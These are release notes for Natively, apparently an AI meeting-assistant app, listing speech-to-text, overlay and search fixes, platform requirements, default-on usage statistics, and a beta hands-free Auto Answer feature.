#### Improved

Answers stick closer to your material. A checking pass removes claims your documents do not support, and a résumé, job description or reference file that fits is read whole.
Coding answers match the size of the question. A quick ask gets a short answer.
Provider failures are explained. The overlay says why in plain words, then tries your next provider and tells you which one answered.
Faster speech-to-text on Deepgram, Soniox and OpenAI, and model pickers for speech providers.
A refreshed look. Liquid Glass controls, a new startup splash, a blue accent and smoother motion in every window.
Rebuilt Settings. Calendar, Companion, About and Setup & Help are new, and Setup & Help shows real recordings.

#### Fixed

Speech-to-text. Google no longer goes silent when Chinese is selected, Soniox recovers after an idle stretch, and ElevenLabs returns text at every pause.
Overlay. Clicks on the pill, the expand button and the model picker no longer get lost, and the resize handles no longer cover Send.
Auto Answer. A prepared answer that was never shown now appears, and your own speech no longer silences the answers that follow.
Shortcuts. A shortcut the system refuses no longer crashes the app, and Natively no longer takes Cmd/Ctrl+R and Shift+Arrow from other apps.
Search. Reference files are searched by meaning, not only by keyword, on installs with no API key, and a damaged meeting index repairs itself.
Windows. The screenshot cropper no longer steals focus, and the extra taskbar buttons are gone.
macOS. The Dock no longer shows two or three Natively icons.

#### Platform

Electron 43.7.7, Vite 7 and React 19.3; requires Node 22.13+ to build from source.
Usage statistics is new and on by default. It reports which features are used and how often, never what you say, see or type. Turn it off under Advanced in Settings → General.

Apple Speech requires a Mac running macOS 26 or later. Select Apple Speech in Audio settings and choose a recognition language. On first use, macOS may download the corresponding speech asset from Apple; the initial startup can therefore take longer and requires a network connection. Once the asset is installed, transcription runs on the device. Language availability is determined by macOS.

Auto Answer (Beta) — Hands-Free Responses

Natively can answer without being asked. When the other person finishes a question, an LLM judge decides whether it is genuinely a question aimed at you — and either answers it or stays silent.

No prompt, no button. Nothing to dismiss and nothing to click; the answer is simply there.
Knows when to stay quiet. Rhetorical asides, questions aimed at someone else, and restatements of something already answered are ignored.
Speaker-aware. It reads speaker labels and splits the conversation by voice, so your own thinking-out-loud doesn't trigger an answer.
